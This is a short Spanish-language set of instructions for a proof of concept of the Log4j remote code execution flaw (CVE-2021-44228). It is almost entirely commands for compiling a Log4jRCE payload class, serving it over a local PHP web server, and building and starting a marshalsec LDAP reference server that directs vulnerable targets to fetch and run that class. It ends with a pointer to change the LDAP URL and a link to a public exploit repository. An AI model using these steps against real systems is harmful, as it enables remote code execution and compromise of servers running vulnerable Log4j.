-
Compilar Log4jRCE.java y mover el archivo .class a un servidor web (ej: PHP local)
cd src/main/java
javac Log4jRCE.java
- Mover archivo .class a server web o iniciar localmente un php, por ejempl :
php -S 127.0.0.1:8888
-
Iniciar LDAP Server
git clone git@github.com:Grupo-Kapa-7/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
- start ldap server
java -cp target/marshalsec-0.0.3-SNAPSHOT-GK7Threats-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"
-
Para proabr la PoC, modificar el archivo src/main/java/log4j.java y cambiar el URL del servidor LDAP a su gusto.
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce